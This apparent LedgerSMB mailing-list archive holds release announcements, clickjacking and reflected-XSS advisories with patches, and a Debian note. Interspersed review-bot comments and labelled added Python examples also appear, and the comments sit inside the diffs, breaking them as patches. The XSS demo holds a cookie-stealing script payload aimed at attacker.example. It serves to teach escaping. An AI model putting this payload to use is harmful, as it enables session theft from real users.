The LedgerSMB development team is happy to announce yet another new
version of its open source ERP and accounting application.
This release contains the following fixes and improvements:
Changelog for 1.7.25
* Faster GL account tree consistency check
* Maintain consistency between ar/ap/gl and transactions tables on delete
* Fix CSV import of inventory adjustment
For installation instructions and system requirements, see
https://github.com/ledgersmb/LedgerSMB/blob/1.7.25/README.md
The release can be downloaded from our download site at
https://download.ledgersmb.org/f/Releases/1.7.25
The release can be downloaded from GitHub at
https://github.com/ledgersmb/LedgerSMB/releases/tag/1.7.25
Or pulled from Docker Hub using the command
$ docker pull ledgersmb/ledgersmb:1.7.25
These are the sha256 checksums of the uploaded files:
3d457b1f107719baed7210c4ad04140acfb3d16aa5106de2a3862911cc026ecb ledgersmb-1.7.25.tar.gz
4ce17568cd2800ccece2cc7adb0a101c6103a00ffe0c1832784873b382295f42 ledgersmb-1.7.25.tar.gz.asc
Hallo,
I see WebService::HMRC on cpan with a note that it was originally
developed for LedgerSMB, but I can find no reference to it in the list
archives.
Is there an existing implementation of this?
Cheers
Lyn
Unfortunately, the fixes for the security vulnerabilities
released on Monday August 23 regressed some functionalities.
This release fixes those regressions:
Changelog for 1.8.19
* Follow-up for the fix to CVE-2021-3693; fix bulk-posting payments
* Follow-up for the fix to CVE-2021-3693; fix incorrectly backported change
For installation instructions and system requirements, see
https://github.com/ledgersmb/LedgerSMB/blob/1.8.19/README.md
The release can be downloaded from our download site at
https://download.ledgersmb.org/f/Releases/1.8.19
The release can be downloaded from GitHub at
https://github.com/ledgersmb/LedgerSMB/releases/tag/1.8.19
Or pulled from Docker Hub using the command
$ docker pull ledgersmb/ledgersmb:1.8.19
These are the sha256 checksums of the uploaded files:
4f818690b39a974680c6264727ddf3ab445a5db780294cad407869d54ed1fb0c ledgersmb-1.8.19.tar.gz
ffc79cb40181b2cf94fcda63afdfaa2b63fd1703502a86f4bbb76a7bfdcb37a0 ledgersmb-1.8.19.tar.gz.asc
Unfortunately, the fixes for the security vulnerabilities
released on Monday August 23 regressed some functionalities.
This release fixes those regressions:
Changelog for 1.7.34
* Follow-up to fix for CVE-2021-3693 to fix display of search results
* Follow-up for the fix to CVE-2021-3693; fix bulk-posting payments
For installation instructions and system requirements, see
https://github.com/ledgersmb/LedgerSMB/blob/1.7.34/README.md
The release can be downloaded from our download site at
https://download.ledgersmb.org/f/Releases/1.7.34
The release can be downloaded from GitHub at
https://github.com/ledgersmb/LedgerSMB/releases/tag/1.7.34
Or pulled from Docker Hub using the command
$ docker pull ledgersmb/ledgersmb:1.7.34
These are the sha256 checksums of the uploaded files:
729ad60745bb3af14249d5ed952ed8d0110788fd7ed444de1bab61a81c2b9450 ledgersmb-1.7.34.tar.gz
e2beddf724b41603162c0263e24944bafeb2231917aeb094173274ee3671b6b1 ledgersmb-1.7.34.tar.gz.asc
The LedgerSMB development team is happy to announce yet another new
version of its open source ERP and accounting application. This
release contains three fixes for security vulnerabilities. Users are
urged to upgrade as soon as possible. Special thanks go to "ranjit-git",
and sudheendra17, users of the https://huntr.dev/ platform, for disclosing
these issues responsibly to the development team. And to the platform
itself for sponsoring the work of these researchers.
This release contains the following fixes and improvements:
Changelog for 1.8.18
* Check whether HTML comes from a valid source; CVE-2021-3693
* Apply HTML escaping on error messages; CVE-2021-3694 (#5754)
* Fix several issues in `bin/prepare-company-database` (#5769)
* Prevent the application being wrapped in a frame; CVE-2021-3731
For installation instructions and system requirements, see
https://github.com/ledgersmb/LedgerSMB/blob/1.8.18/README.md
The release can be downloaded from our download site at
https://download.ledgersmb.org/f/Releases/1.8.18
The release can be downloaded from GitHub at
https://github.com/ledgersmb/LedgerSMB/releases/tag/1.8.18
Or pulled from Docker Hub using the command
$ docker pull ledgersmb/ledgersmb:1.8.18
These are the sha256 checksums of the uploaded files:
c3ed50b78a0cebc6ef7edfab6a5b1c7b6b5b2f5545bf2d680ad6c3f6cbca5be2 ledgersmb-1.8.18.tar.gz
133fae3563fa1be3eb4cd48ec06347187ba165bbeeb854c92ed03d9c08111ae0 ledgersmb-1.8.18.tar.gz.asc
The LedgerSMB development team is happy to announce yet another new
version of its open source ERP and accounting application. This
release contains three fixes for security vulnerabilities. Users are
urged to upgrade as soon as possible. Special thanks go to "ranjit-git",
and sudheendra17, users of the https://huntr.dev/ platform, for disclosing
these issues responsibly to the development team. And to the platform
itself for sponsoring the work of these researchers.
This release contains the following fixes and improvements:
Changelog for 1.7.33
* Check whether HTML comes from a valid source; CVE-2021-3693
* Apply HTML escaping on error messages; CVE-2021-3694 (#5766)
* Prevent the application being wrapped in a frame; CVE-2021-3731
* Align filters between UI and the database on draft transaction search (#5693)
* Correctly present manual tax and invoice total on reversing invoice (#5721)
* Repeatedly saving a draft invoice pops up an SQL error (#5679)
For installation instructions and system requirements, see
https://github.com/ledgersmb/LedgerSMB/blob/1.7.33/README.md
The release can be downloaded from our download site at
https://download.ledgersmb.org/f/Releases/1.7.33
The release can be downloaded from GitHub at
https://github.com/ledgersmb/LedgerSMB/releases/tag/1.7.33
Or pulled from Docker Hub using the command
$ docker pull ledgersmb/ledgersmb:1.7.33
These are the sha256 checksums of the uploaded files:
15dcc79a42fd17f12d01e1cc4b36ddd25e8dbe776ffe1b9867a1ad9e42bfabc0 ledgersmb-1.7.33.tar.gz
73eadc3bf2c2b3d2abeabe52ccc3db03dd5e46599d4a84a3a72ef10105d6ab36 ledgersmb-1.7.33.tar.gz.asc
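Each announcement ends with the sha256 digests of the tarball and of its detached signature file. The following is an added example, not part of the announcements and not LedgerSMB project code: it parses lines in that `<hex digest> <file name>` form and checks the named files in a download directory. The file names are taken from the 1.7.33 announcement; the file contents and the digest list in `demo()` are constructed, so the real digests above are not reproduced here.

```python
"""Verify downloaded release files against a published sha256 list.

Added example, not LedgerSMB code. Parses '<hex digest>  <file name>' lines as
printed in the release announcements and checks each named file on disk.
A matching digest for the .asc file only proves the signature file arrived
intact; the signature itself still has to be verified with gpg, which this
code deliberately does not attempt.
"""
import hashlib
import hmac
import os
import re
import tempfile

# One announcement line: 64 hex characters, whitespace, file name. A leading '*'
# before the name (sha256sum's binary-mode marker) is tolerated.
CHECKSUM_LINE = re.compile(r"^([0-9a-fA-F]{64})\s+\*?(\S+)$")


def parse_checksums(text):
    """Map file name -> lowercase hex digest for every well-formed line; other lines are ignored."""
    digests = {}
    for line in text.splitlines():
        m = CHECKSUM_LINE.match(line.strip())
        if m:
            digests[m.group(2)] = m.group(1).lower()
    return digests


def sha256_file(path):
    """Stream the file through SHA-256; release tarballs are too large to slurp."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def verify_release_dir(directory, checksum_text):
    """Check every listed file under `directory`.

    Returns {name: "ok" | "MISMATCH" | "missing"}. A MISMATCH on the tarball means
    do not unpack it. Only the base name of each entry is used, so a list cannot
    point the check at files outside the download directory.
    """
    results = {}
    for name, expected in parse_checksums(checksum_text).items():
        path = os.path.join(directory, os.path.basename(name))
        if not os.path.isfile(path):
            results[name] = "missing"
            continue
        actual = sha256_file(path)
        results[name] = "ok" if hmac.compare_digest(actual, expected) else "MISMATCH"
    return results


def demo():
    """Constructed fixture: an intact tarball, a tampered signature file and a file
    that was never downloaded; the list is laid out the way an announcement prints it."""
    with tempfile.TemporaryDirectory() as d:
        good = os.path.join(d, "ledgersmb-1.7.33.tar.gz")       # name from the announcement
        with open(good, "wb") as f:
            f.write(b"constructed tarball bytes, not the real release\n")
        asc = os.path.join(d, "ledgersmb-1.7.33.tar.gz.asc")
        with open(asc, "wb") as f:
            f.write(b"-----BEGIN PGP SIGNATURE-----\n(constructed, tampered)\n")
        announcement = "\n".join([
            "These are the sha256 checksums of the uploaded files:",
            f"{sha256_file(good)} ledgersmb-1.7.33.tar.gz",
            f"{'0' * 64} ledgersmb-1.7.33.tar.gz.asc",   # wrong on purpose
            f"{'f' * 64} ledgersmb-1.7.33.zip",          # never downloaded
        ])
        return verify_release_dir(d, announcement)


if __name__ == "__main__":
    for name, status in demo().items():
        print(f"{status:9} {name}")
```

In practice, paste the announcement's checksum block into a file and call `verify_release_dir` on the download directory, then run `gpg --verify ledgersmb-<version>.tar.gz.asc ledgersmb-<version>.tar.gz` with the project's release key; the digest check and the signature check answer different questions.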
On August 20th, the LedgerSMB project was advised of a security
vulnerability in the code. Please see below our security advisory.
Insufficient protection against 'clickjacking'
Summary:
========
LedgerSMB does not sufficiently guard against being wrapped by
other sites, making it vulnerable to 'clickjacking'. This allows
an attacker to trick a targeted user into executing unintended actions.
Known vulnerable:
=================
All of:
- 1.1.0 up to 1.1.12 (inclusive)
- 1.2.0 up to 1.2.26 (inclusive)
- 1.3.0 up to 1.3.47 (inclusive)
- 1.4.0 up to 1.4.42 (inclusive)
- 1.5.0 up to 1.5.30 (inclusive)
- 1.6.0 up to 1.6.33 (inclusive)
- 1.7.0 up to 1.7.32 (inclusive)
- 1.8.0 up to 1.8.17 (inclusive)
Known fixed:
============
- 1.7.33
- 1.8.18
Details:
========
In a clickjacking attack, an attacker (invisibly) wraps the vulnerable
site in his own site, carefully placing elements of his own site over
elements of the wrapped site, tricking the user into performing unintended
actions on the vulnerable site. More information on clickjacking is on the
OWASP page at https://owasp.org/www-community/attacks/Clickjacking
The lack of protection dates back to version 1.0, although it must
be noted that mitigation measures were first available in browsers
as of 2011 -- the year of the release of 1.3.0.
Severity:
=========
CVSSv3.1 Base Score: 5.9 (Medium)
CVSSv3.1 Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:L/A:N
Recommendations:
================
We recommend that all users upgrade to known-fixed versions. Versions prior
to 1.7 are end-of-life and will not receive security fixes from the
LedgerSMB project.
Users who cannot upgrade may apply the included patches, or are advised
to contact a vendor for custom support.
As a workaround, administrators may configure their webservers to add
the Content-Security-Policy header as documented in the content
security policy site at https://content-security-policy.com/#server.
References:
===========
CVE-2021-3731 (LedgerSMB)
https://ledgersmb.org/cve-2021-3731-clickjacking
https://huntr.dev/bounties/5664331d-f5f8-4412-8566-408f8655888a/
Reported by:
============
sudheendra17, user of the huntr.dev platform
Patches:
========
Patch for LedgerSMB 1.8 (1.8.0 up to 1.8.17, inclusive):
-------------------------------------------------------
[[[
diff --git a/lib/LedgerSMB/PSGI.pm b/lib/LedgerSMB/PSGI.pm
index b0b20a95b..a4785a9f1 100644
--- a/lib/LedgerSMB/PSGI.pm
+++ b/lib/LedgerSMB/PSGI.pm
@@ -122,6 +122,9 @@ sub old_app {
return Plack::Util::response_cb(
$handler->($env),
sub {
+ Plack::Util::header_set($_[0]->[1],
+ 'Content-Security-Policy',
+ q{frame-ancestors 'self'});
if (not Plack::Util::header_exists($_[0]->[1],
'X-LedgerSMB-App-Content')) {
Plack::Util::header_push($_[0]->[1],
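Review bot: `Plack::Util::header_set` at the top of the callback replaces any Content-Security-Policy header the wrapped handler already emitted, so a response that carried other CSP directives loses them silently; `header_push` (browsers enforce every CSP header present) or merging `frame-ancestors 'self'` into an existing value avoids that. Browsers that predate CSP2 only honour X-Frame-Options, so an `X-Frame-Options: SAMEORIGIN` header alongside this one would cover the 2011-era mitigation the advisory refers to.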
@@ -179,6 +182,9 @@ sub psgi_app {
}
};
+ Plack::Util::header_set($res->[1],
+ 'Content-Security-Policy',
+ q{frame-ancestors 'self'});
return $res;
}
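Review bot: this is the second copy of the same three lines (old_app above, psgi_app here), and nothing ensures a further entry point gets them; a small Plack middleware wrapped around the whole application in the builder would set the header once for every response, including errors produced before any handler runs. As written, `header_set($res->[1], ...)` also assumes `$res` is an array-ref response; if psgi_app can return a delayed (code-ref) response, `$res->[1]` is not a header list.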
]]]
Patch for LedgerSMB 1.7 (1.7.0 up to 1.7.32, inclusive):
-------------------------------------------------------
[[[
diff --git a/lib/LedgerSMB/PSGI.pm b/lib/LedgerSMB/PSGI.pm
index ec8be07f1..bcb478524 100644
--- a/lib/LedgerSMB/PSGI.pm
+++ b/lib/LedgerSMB/PSGI.pm
@@ -91,6 +91,9 @@ sub old_app {
return Plack::Util::response_cb(
$handler->(@_),
sub {
+ Plack::Util::header_set($_[0]->[1],
+ 'Content-Security-Policy',
+ q{frame-ancestors 'self'});
if (not Plack::Util::header_exists($_[0]->[1],
'X-LedgerSMB-App-Content')) {
Plack::Util::header_push($_[0]->[1],
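Review bot: `frame-ancestors 'self'` still permits LedgerSMB to be framed from its own origin; that is only needed if some part of the UI loads LedgerSMB pages in an iframe, otherwise `'none'` is the stricter value and closes the same-origin case too. Whichever is chosen, the header is sent unconditionally on every old_app response, which deserves a line in the changelog so administrators know it is there.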
@@ -159,6 +162,9 @@ sub psgi_app {
}
};
+ Plack::Util::header_set($res->[1],
+ 'Content-Security-Policy',
+ q{frame-ancestors 'self'});
return $res;
}
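Review bot: combined with the webserver workaround given under Recommendations, a response now carries two Content-Security-Policy headers, the application's and the proxy's. Browsers enforce all of them, so the effective rule is the intersection; that is safe for frame-ancestors but will surprise an administrator who configured a broader allow-list at the proxy and finds it has no effect. Worth a sentence in the release notes. Since the old_app and psgi_app hunks add an identical value, a single constant or helper would keep the two copies from drifting apart in later backports.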
]]]
--
Bye,
Erik.
http://efficito.com -- Hosted accounting and ERP.
Robust and Flexible. No vendor lock-in.
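The browser rules the advisory relies on (which header wins, what a CSP header without frame-ancestors does, how several policies combine) are easy to get wrong when applying the webserver workaround. The following is an added example, not LedgerSMB code and not part of the advisory, written in Python rather than the project's Perl so it runs stand-alone: it takes a response's header list and an intended framing origin and decides whether a current browser would allow the frame. The origins `books.example`, `attacker.example` and `portal.example` are constructed; source matching is a simplified CSP3 host match (no path component, no http-to-https upgrade).

```python
"""Decide whether a response's headers stop a given origin from framing it.

Added example, not LedgerSMB code. Encodes the browser rules that matter for
CVE-2021-3731: enforced Content-Security-Policy frame-ancestors directives
(every policy present must allow the framer; they take precedence over
X-Frame-Options), then X-Frame-Options DENY/SAMEORIGIN, and nothing else.
A Report-Only policy, or a CSP header with no frame-ancestors directive,
gives no protection at all.
"""
from urllib.parse import urlsplit

DEFAULT_PORTS = {"http": 80, "https": 443}


def origin_of(url):
    """(scheme, host, port) for a URL, with the port filled in from the scheme."""
    p = urlsplit(url)
    scheme = p.scheme.lower()
    return scheme, (p.hostname or "").lower(), p.port or DEFAULT_PORTS.get(scheme)


def source_matches(source, framer, page):
    """One CSP source expression against the framer's (scheme, host, port).
    Simplified CSP3 host matching: no path component, no http->https upgrade."""
    src = source.lower()
    if src == "'self'":
        return framer == page
    if src == "*":
        return True
    if src.endswith(":") and "://" not in src:          # scheme-source, e.g. "https:"
        return framer[0] == src[:-1]
    scheme, rest = (src.split("://", 1) if "://" in src else (None, src))
    host, _, port = rest.partition(":")
    if scheme is not None and scheme != framer[0]:
        return False
    if host.startswith("*."):
        if not framer[1].endswith(host[1:]):            # "*.example" -> ".example" suffix
            return False
    elif host != framer[1]:
        return False
    if port == "*":
        return True
    if port:
        return port.isdigit() and int(port) == framer[2]
    return framer[2] == DEFAULT_PORTS.get(framer[0])    # no port given: scheme default


def frame_ancestors_policies(headers):
    """Source list of every enforced frame-ancestors directive. Each
    Content-Security-Policy header is its own policy; the Report-Only header
    is deliberately not collected because browsers do not enforce it."""
    policies = []
    for name, value in headers:
        if name.lower() != "content-security-policy":
            continue
        for directive in value.split(";"):
            tokens = directive.split()
            if tokens and tokens[0].lower() == "frame-ancestors":
                policies.append(tokens[1:])
    return policies


def policy_allows(sources, framer, page):
    """'none' (or an empty source list) matches nothing; otherwise any source may match."""
    sources = [s for s in sources if s.lower() != "'none'"]
    return any(source_matches(s, framer, page) for s in sources)


def framing_allowed(headers, page_url, framer_url):
    """Would a current browser let framer_url's origin put this response in a frame?
    `headers` is a list of (name, value) pairs so repeated headers, e.g. one from
    the application and one from a reverse proxy, are all seen. Returns (allowed, reason)."""
    page, framer = origin_of(page_url), origin_of(framer_url)
    policies = frame_ancestors_policies(headers)
    if policies:
        # frame-ancestors overrides X-Frame-Options; every policy must allow the framer.
        return (all(policy_allows(p, framer, page) for p in policies),
                f"frame-ancestors in {len(policies)} enforced policy header(s)")
    for name, value in headers:
        if name.lower() == "x-frame-options":
            v = value.strip().upper()
            if v == "DENY":
                return False, "X-Frame-Options: DENY"
            if v == "SAMEORIGIN":
                return framer == page, "X-Frame-Options: SAMEORIGIN"
            return True, f"X-Frame-Options '{value}' is ignored by current browsers"  # e.g. ALLOW-FROM
    return True, "no framing protection"


# Constructed origins for the demo.
PAGE = "https://books.example"
EVIL = "https://attacker.example"
PATCHED = [("Content-Security-Policy", "frame-ancestors 'self'")]   # what the fix emits


def demo():
    """Cases a practitioner checks after deploying the fix or the workaround."""
    return {
        "unpatched": framing_allowed([("Content-Type", "text/html")], PAGE, EVIL)[0],
        "patched_vs_attacker": framing_allowed(PATCHED, PAGE, EVIL)[0],
        "patched_vs_self": framing_allowed(PATCHED, PAGE, PAGE)[0],
        # A CSP header that never mentions frame-ancestors does nothing against framing.
        "csp_without_frame_ancestors": framing_allowed(
            [("Content-Security-Policy", "default-src 'self'")], PAGE, EVIL)[0],
        "report_only": framing_allowed(
            [("Content-Security-Policy-Report-Only", "frame-ancestors 'none'")], PAGE, EVIL)[0],
        "xfo_deny": framing_allowed([("X-Frame-Options", "DENY")], PAGE, EVIL)[0],
        # frame-ancestors wins even when X-Frame-Options would have allowed the frame.
        "csp_none_beats_xfo_sameorigin": framing_allowed(
            [("X-Frame-Options", "SAMEORIGIN"),
             ("Content-Security-Policy", "frame-ancestors 'none'")], PAGE, PAGE)[0],
        # Proxy adds a wider policy next to the app's: both are enforced, so 'self' still blocks.
        "two_policies_intersect": framing_allowed(
            PATCHED + [("Content-Security-Policy", "frame-ancestors https://*.example")],
            PAGE, "https://portal.example")[0],
        "wildcard_subdomain": framing_allowed(
            [("Content-Security-Policy", "frame-ancestors https://*.example:443")],
            PAGE, "https://portal.example")[0],
    }


if __name__ == "__main__":
    for case, allowed in demo().items():
        print(f"{case:32} {'FRAMEABLE' if allowed else 'blocked'}")
```

To audit a live deployment, feed it the header list from an actual response (for example the `raw_headers` of a `urllib` response) rather than the constructed cases in `demo()`; the two-policy case is the one to look at when both the patch and the webserver workaround are in place.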
On August 4th, the LedgerSMB project was advised of a security
vulnerability in the code. Please see below our security advisory.
Reflected cross-site scripting of authenticated users in LedgerSMB
Summary:
========
LedgerSMB does not sufficiently HTML-encode error messages sent to the
browser. By sending a specially crafted URL to an authenticated user,
this flaw can be abused for remote code execution and information
disclosure.
Known vulnerable:
=================
All of:
- 1.1.0 up to 1.1.12 (inclusive)
- 1.2.0 up to 1.2.26 (inclusive)
- 1.3.0 up to 1.3.47 (inclusive)
- 1.4.0 up to 1.4.42 (inclusive)
- 1.5.0 up to 1.5.30 (inclusive)
- 1.6.0 up to 1.6.33 (inclusive)
- 1.7.0 up to 1.7.32 (inclusive)
- 1.8.0 up to 1.8.17 (inclusive)
Known fixed:
============
- 1.7.33
- 1.8.18
Details:
========
When encountering an error, LedgerSMB sends the user feedback which may
include user-provided input. This input was not sufficiently sanitized
before being included in the error report. This allows an attacker to inject
a script into the error response page by sending a specially crafted URL to an
authenticated user. As the error page itself does not contain any sensitive
information, a sophisticated payload, in addition to targeting a sufficiently
privileged user, is required for information disclosure.
Proper audit control and separation of duties limit the Integrity impact of
the attack vector.
The vulnerable code to provide this user feedback dates back to version 1.0.
Please note that not all error messages are vulnerable to this attack, as not
all messages report the problematic input to the user.
Severity:
=========
CVSSv3.1 Base Score: 8.2 (High)
CVSSv3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N
Recommendations:
================
We recommend that all users upgrade to known-fixed versions. Versions prior
to 1.7 are end-of-life and will not receive security fixes from the
LedgerSMB project.
Users who cannot upgrade may apply the included patches, or are advised
to contact a vendor for custom support.
There are no workarounds available for this vulnerability.
References:
===========
CVE-2021-3694 (LedgerSMB)
https://ledgersmb.org/cve-2021-3694-cross-site-scripting
https://huntr.dev/bounties/ef7f4cf7-3a81-4516-b261-f5b6ac21430c/
Reported by:
============
ranjit-git, user of the huntr.dev platform
Patches:
========
Patch for LedgerSMB 1.8 (1.8.0 up to 1.8.17, inclusive):
-------------------------------------------------------
[[[
diff --git a/lib/LedgerSMB/PSGI/Util.pm b/lib/LedgerSMB/PSGI/Util.pm
index 11c01918f..bf443d886 100644
--- a/lib/LedgerSMB/PSGI/Util.pm
+++ b/lib/LedgerSMB/PSGI/Util.pm
@@ -24,6 +24,7 @@ use strict;
use warnings;
use Carp;
+use HTML::Escape;
use HTTP::Status qw( HTTP_OK HTTP_INTERNAL_SERVER_ERROR HTTP_SEE_OTHER
HTTP_BAD_REQUEST );
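Review bot: `use HTML::Escape` adds a runtime dependency that this patch does not declare; unless HTML::Escape is already in the cpanfile and in the Debian and Docker package dependencies, a patched install dies at compile time with "Can't locate HTML/Escape.pm". Declare it in the same change, or document that administrators applying the patch by hand must install it first.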
@@ -41,7 +42,7 @@ Returns a standard error representation for HTTP status
500
sub internal_server_error {
- my ($msg, $title, $company, $dbversion) = @_;
+ my ($msg, $title, $company, $dbversion) = map { escape_html($_ // '')
} @_;
$title //= 'Error!';
$msg =~ s/\n/<br>/g;
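Review bot: the `// ''` inside the `map` on the `+` line breaks the `$title //= 'Error!'` default on the next context line: an undefined `$title` becomes `escape_html('')`, which is the defined empty string, so the default never fires and the error page gets an empty heading. Apply the default before escaping (`$title //= 'Error!'` ahead of the `map`) or test with `length $title`. The rest of the ordering is right: escaping runs before `s/\n/<br>/g`, so the inserted `<br>` survives while a `<` supplied by the caller is neutralised; callers that previously passed pre-formatted HTML in `$msg` will now see it as text, which the changelog should mention.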
diff --git a/old/lib/LedgerSMB/oldHandler.pm
b/old/lib/LedgerSMB/oldHandler.pm
index 1db966406..848eeb75c 100644
--- a/old/lib/LedgerSMB/oldHandler.pm
+++ b/old/lib/LedgerSMB/oldHandler.pm
@@ -57,6 +57,7 @@ use LedgerSMB::Sysconfig;
use Cookie::Baker;
use Digest::MD5;
+use HTML::Escape;
use Log::Log4perl;
use Try::Tiny;
@@ -184,14 +185,17 @@ sub handle {
sub _error {
my ($form, $msg, $status) = @_;
$msg = "? _error" if !defined $msg;
+ my $html_msg = escape_html($msg);
+ my $html_dbversion = escape_html($form->{dbversion});
+ my $html_company = escape_html($form->{company});
$status = 500 if ! defined $status;
print qq|Status: $status ISE
Content-Type: text/html; charset=utf-8
<html>
-<body><h2 class="error">Error!</h2> <p><b>$msg</b></p>
-<p>dbversion: $form->{dbversion}, company: $form->{company}</p>
+<body><h2 class="error">Error!</h2> <p><b>$html_msg</b></p>
+<p>dbversion: $html_dbversion, company: $html_company</p>
</body>
</html>
|;
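Review bot: unlike the `internal_server_error` hunk, the three `escape_html` calls here have no `// ''` guard, so an `_error` raised before `$form->{dbversion}` or `$form->{company}` is populated (a failed database connection, for instance) passes undef into `escape_html`; add the same guard for consistency. `$status` is interpolated unescaped into the `Status:` line; that is fine while every caller passes a numeric status, but a `$status =~ /^\d{3}$/` check with a fallback to 500 would make that assumption explicit.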
]]]
Patch for LedgerSMB 1.7 (1.7.0 up to 1.7.32, inclusive):
-------------------------------------------------------
[[[
diff --git a/lib/LedgerSMB/PSGI/Util.pm b/lib/LedgerSMB/PSGI/Util.pm
index 2d6195d69..b716a01c4 100644
--- a/lib/LedgerSMB/PSGI/Util.pm
+++ b/lib/LedgerSMB/PSGI/Util.pm
@@ -24,6 +24,7 @@ use strict;
use warnings;
use Carp;
+use HTML::Escape;
use HTTP::Status qw( HTTP_OK HTTP_INTERNAL_SERVER_ERROR HTTP_SEE_OTHER
HTTP_UNAUTHORIZED );
@@ -41,7 +42,7 @@ Returns a standard error representation for HTTP status
500
sub internal_server_error {
- my ($msg, $title, $company, $dbversion) = @_;
+ my ($msg, $title, $company, $dbversion) = map { escape_html($_ // '')
} @_;
$title //= 'Error!';
$msg =~ s/\n/<br>/g;
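Review bot: same defaulting regression as in the 1.8 hunk for this function: after `map { escape_html($_ // '') } @_`, `$title` is always defined, so `$title //= 'Error!'` on the following context line no longer applies for an undefined title. Move the default above the `map` or test with `length $title`.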
diff --git a/old/bin/old-handler.pl b/old/bin/old-handler.pl
index 24fa7a0a0..87864fc7e 100644
--- a/old/bin/old-handler.pl
+++ b/old/bin/old-handler.pl
@@ -187,14 +187,16 @@ $form->{dbh}->disconnect() if defined $form->{dbh};
sub _error {
my ($form, $msg, $status) = @_;
$msg = "? _error" if !defined $msg;
+ my $html_msg = escape_html($msg);
+ my $html_dbversion = escape_html($form->{dbversion});
+ my $html_company = escape_html($form->{company});
$status = 500 if ! defined $status;
print qq|Status: $status ISE
Content-Type: text/html; charset=utf-8
-
<html>
-<body><h2 class="error">Error!</h2> <p><b>$msg</b></p>
-<p>dbversion: $form->{dbversion}, company: $form->{company}</p>
+<body><h2 class="error">Error!</h2> <p><b>$html_msg</b></p>
+<p>dbversion: $html_dbversion, company: $html_company</p>
</body>
</html>
|;
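Review bot: the lone `-` line removes the blank line between `Content-Type: text/html; charset=utf-8` and `<html>`. In CGI-style output that blank line terminates the header block, and the `Status:` line suggests this output is parsed as CGI headers; without it `<html>` is read as a malformed header and the body is lost or the response rejected. The removal is unrelated to the escaping change and should either be dropped from the patch or justified in the commit message, since nothing in the hunk shows the old-handler.pl output path no longer needs the separator.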
]]]
--
Bye,
Erik.
http://efficito.com -- Hosted accounting and ERP.
Robust and Flexible. No vendor lock-in.
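The Details section above describes the bug in one sentence: request-derived values were interpolated into the error page unescaped. The following is an added example, not LedgerSMB code and not from the advisory, that renders the same error page shape in Python (html.escape standing in for Perl's HTML::Escape) in its pre-patch form, its hardened form, and a third form that escapes in the wrong order. It also covers the defaulting detail the hunks make easy to miss: escaping None to '' before applying a defined-or default leaves the title empty. `EVIL_COMPANY` and `MULTILINE_MSG` are constructed inputs.

```python
"""Reflected XSS in an error page, and the escaping that closes it.

Added example, not LedgerSMB code: a Python rendering of the pattern that the
CVE-2021-3694 patches change in internal_server_error and _error.
"""
import html
import re

# Constructed values standing in for what a crafted URL puts into the request
# (the flaw is reflected: the victim's own click delivers the payload).
EVIL_COMPANY = "<script>fetch('https://attacker.example/?c=' + document.cookie)</script>"
MULTILINE_MSG = "Error: posting failed\nsee the log for details"

TEMPLATE = ('<html><body><h2 class="error">{title}</h2> <p><b>{msg}</b></p>\n'
            '<p>dbversion: {dbversion}, company: {company}</p></body></html>\n')

LIVE_SCRIPT = re.compile(r"<script\b", re.IGNORECASE)


def _esc(value):
    """HTML-escape one value; None becomes the empty string, like Perl's `$_ // ''`."""
    return html.escape("" if value is None else str(value), quote=True)


def render_error_vulnerable(msg, title=None, company="", dbversion=""):
    """Pre-patch shape: request-derived values interpolated straight into HTML."""
    title = "Error!" if title is None else title
    return TEMPLATE.format(title=title, msg=msg.replace("\n", "<br>"),
                           dbversion=dbversion, company=company)


def render_error_fixed(msg, title=None, company="", dbversion=""):
    """Post-patch shape, with two details the Perl hunks make easy to get wrong:
    1. escape first, then insert our own <br> markup; the reverse order (see
       render_error_wrong_order) is still safe but destroys the line breaks;
    2. apply the 'Error!' default before escaping: escaping None to '' first
       leaves a defined-but-empty title, so a defined-or default never fires."""
    title = "Error!" if not title else title
    return TEMPLATE.format(title=_esc(title), msg=_esc(msg).replace("\n", "<br>"),
                           dbversion=_esc(dbversion), company=_esc(company))


def render_error_wrong_order(msg, title=None, company="", dbversion=""):
    """Escaping after the <br> substitution: no XSS, but <br> becomes &lt;br&gt;."""
    title = "Error!" if not title else title
    return TEMPLATE.format(title=_esc(title), msg=_esc(msg.replace("\n", "<br>")),
                           dbversion=_esc(dbversion), company=_esc(company))


def contains_live_script(page):
    """Crude oracle for the demo: an unescaped <script tag survived into the page."""
    return LIVE_SCRIPT.search(page) is not None


def demo():
    """Outcomes for the constructed inputs, keyed by what each one shows."""
    return {
        "vulnerable_runs_script": contains_live_script(
            render_error_vulnerable("x", company=EVIL_COMPANY)),
        "fixed_runs_script": contains_live_script(
            render_error_fixed("x", company=EVIL_COMPANY)),
        "fixed_keeps_line_breaks": "<br>" in render_error_fixed(MULTILINE_MSG),
        "wrong_order_keeps_line_breaks": "<br>" in render_error_wrong_order(MULTILINE_MSG),
        "fixed_default_title": '<h2 class="error">Error!</h2>' in render_error_fixed("x", title=None),
        "fixed_escapes_quotes": "&quot;" in render_error_fixed('bad value "x"'),
    }


if __name__ == "__main__":
    print(render_error_vulnerable("x", company=EVIL_COMPANY))
    print(render_error_fixed("x", company=EVIL_COMPANY))
```

The oracle in `contains_live_script` is deliberately crude; it is enough to show the difference between the three renderers on this payload, not a general XSS detector.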
Hi all,
On August 14, Debian released the 11th version of its Linux distribution:
Bullseye. Where the previous version (10 / Buster) had seriously broken
packages for LedgerSMB -- to the extent that you could say that LedgerSMB
wasn't really included at all --, we were just in time before the code
freeze to submit fixed packages to Bullseye. The fixed packages quickly
migrated to various Debian-based distributions, including Ubuntu (which
included the fixed package in 21.04 / hirsute).
Sending this mail to notify anybody who tried to install LedgerSMB using
the distribution-supplied packages on Debian or Ubuntu: the packages in the
latest stable repositories should be working correctly again!
PS: While the packages are back in a working state, the current release is
1.6.9. The goal for Debian 12 (Bookworm) is to deliver a close-to-current
version of LedgerSMB when it releases.
--
Bye,
Erik.
http://efficito.com -- Hosted accounting and ERP.
Robust and Flexible. No vendor lock-in.